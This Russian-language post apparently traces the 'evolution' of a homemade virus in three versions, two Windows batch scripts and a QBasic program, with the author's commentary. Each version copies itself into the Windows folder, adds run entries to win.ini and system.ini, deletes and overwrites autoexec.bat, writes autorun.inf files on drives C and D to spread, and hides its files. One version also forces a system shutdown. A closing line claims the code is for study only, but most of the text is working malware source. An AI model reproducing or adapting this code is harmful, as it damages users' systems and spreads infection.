Это первый найденный прототип!

@echo off
copy cs.bat c:/%windir%/system
echo run=c:/%windir%/system/cs.bat >> win.ini
echo run=c:/%windir%/system/cs.bat >> system.ini
echo MY NAME IS cs
label LOHOLAMMER
if exist c:\autoexec.bat attrib c:\autoexec.bat -h -s -a -r
deltree /y c:\autoexec.bat > nul
echo autoexec.bat echo YOU ARE LAMMER!!!! > c:\autoexec.bat
echo var WSHShell = WScript.CreateObject(«WScript.Shell»); > %temp%\mes.js
echo WSHShell.Popup(«Warning,!! Ваш комппьютер заражен вирусом, а избавиться от
него нельзя, хе-хе-хе»); >> %temp%\mes.js start %temp%\mes.js
deltree /y %temp%\mes.js
attrib c:\autoexec.bat +h +s +a +r
pause
cls

В этом случае добавилось новых команд, т, к, чего-то плохого сделать я не хотел!!

@echo off
label LOHOLAMMER
copy kas.bat %windir%
if exist c:\autoexec.bat attrib c:\autoexec.bat -h -s -a -r
deltree /y c:\autoexec.bat
if exist c:\io.sys echo autoexec.bat echo YOU ARE LAMMER!!!! > c:\autoexec.bat
echo run=%windir%\kas.bat >> %windir%\win.ini
echo run=%windir%\kas.bat >> %windir%\system.ini
echo [AutoRun] > c:\autorun.inf
echo open=c:\autoexec.bat > c:\autorun.inf
echo [AutoRun] > d:\autorun.inf
echo open=c:\autoexec.bat > d:\autorun.inf
ren kas.bat autoexec.bat
echo var WSHShell = WScript.CreateObject(«WScript.Shell»); > %temp%\mes.js
echo WSHShell.Popup(«Warning,!! А теперь необходимо перезагрузиться»); >> %temp%\mes.js
start %temp%\mes.js
deltree /y %temp%\mes.js
attrib c:\autoexec.bat +h +s +a +r
pause
rundll32 krnl386.exe,exitkernel
cls

Примитивный бейсиковый вирус. Вирус написанный на Qbasic. Реликвия!

SCREEN 0
SHELL «echo Программа установки обновляет файлы конфигурации. подождите..»
SHELL «label mp_k»
SHELL «copy mp_k.exe %windir%»
SHELL «if exist c:\autoexec.bat attrib c:\autoexec.bat -h -s -a -r»
SHELL «deltree /y c:\autoexec.bat > nul»
SHELL «echo autoexec.bat echo ( [_H@CKED_] ) >> c:\autoexec.bat »
SHELL «echo [windows] >> %windir%\win.ini»
SHELL «echo run = %windir%\mp_k.exe >> %windir%\win.ini»
SHELL «echo [windows] >> %windir%\system.ini»
SHELL «echo run = %windir%\mp_k.exe >> %windir%\system.ini»
SHELL «echo [AutoRun] > c:\autorun.inf»
SHELL «echo open= %windir%\mp_k.exe >> c:\autorun.inf»
SHELL «echo [AutoRun] > d:\autorun.inf»
SHELL «echo open= %windir%\mp_k.exe >> d:\autorun.inf»
SHELL «attrib c:\autoexec.bat»
SHELL «attrib %windir%\mp_k.exe +h +s +a +r»
SHELL «attrib c:\autorun.inf +h +s +a +r»
SHELL «attrib d:\autorun.inf +h +s +a +r»
SHELL «pause»
SHELL «deltree /y mp_k.exe»
SHELL «cls»

Вот и вся эволюция вируса «mp_k» (если это можно назвать вирусом)

Также сделал его скрытым т,е открывающимся и закрывающимся мгновенно и свергнуто!
Убрал приколизм! типа вы заражены соображающий юзер сразу его заметит но не сразу
избавится, вирь ничего страшного не делает, просто портит autoexec.bat….. Работает только под Win 95-98
На ХР не потянет надо дописать так как там и вовсех НТ Autoexec.bat не пашет там файл boot.ini,
Но размножаться может во всех мастдаях!!! :)

Статьи написаны исключительно для изучения алгоритмов работы вирусов и методов борьбы с ними. Алгоритмы работы вирусов были выявлены при декомпиляции найденных в интернете вирусов и на сайте Лаборатории Касперского.